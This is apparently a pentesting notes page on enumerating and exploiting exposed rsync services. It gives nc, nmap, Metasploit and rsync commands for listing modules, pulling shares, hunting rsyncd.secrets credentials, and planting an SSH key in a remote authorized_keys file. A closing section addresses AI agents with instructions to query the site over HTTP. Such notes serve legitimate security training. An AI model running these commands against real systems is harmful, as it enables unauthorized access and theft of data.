# Pentesting Rsync

## Rsync port 873

* Basic information
* [https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsynchttps://phoenixnap.com/kb/how-to-rsync-over-ssh)
* [https://phoenixnap.com/kb/how-to-rsync-over-ssh](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsynchttps://phoenixnap.com/kb/how-to-rsync-over-ssh)
* rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification timesand sizes of files.

```
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```

* Enumerate shared folders
* An rsync module is essentially a directory share. These modules can optionally be protected by a password.
* This options lists the available modules and, optionally, determines if the module requires a password to access:

```
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```

* Manual Rsync
* List a shared folder

```
rsync -av --list-only rsync:/10.10.232.5/shared_name
```

* Copy all files to your local machine via the following command:

```
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```

* If you have credentials you can list/download a shared name using (the password will be prompted):

```
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
proxychains rsync -av --list-only rsync://svc_ipmi@172.16.210.34/svc_rsync
```

* You could also upload some content using rsync (for example, in this case we can upload an authorized\_keys file to obtain access to the box):

```
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://rsync-connect@10.10.63.208/files/sys-internal/.ssh/authorized_keys
```

* Find the rsyncd configuration file:

```
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```

* Inside the config file sometimes you could find the parameter `secrets file = /path/to/file` and this file could contains usernames and passwords allowed to authenticate to rsyncd.

## Rsync Over SSH

```
rsync -av -e ssh rsync://user@host/share ./local-dir
rsync -av -e "ssh -p2222" rsync://user@host/share ./local-dir
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/recon-enumeration/pentesting-rsync.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.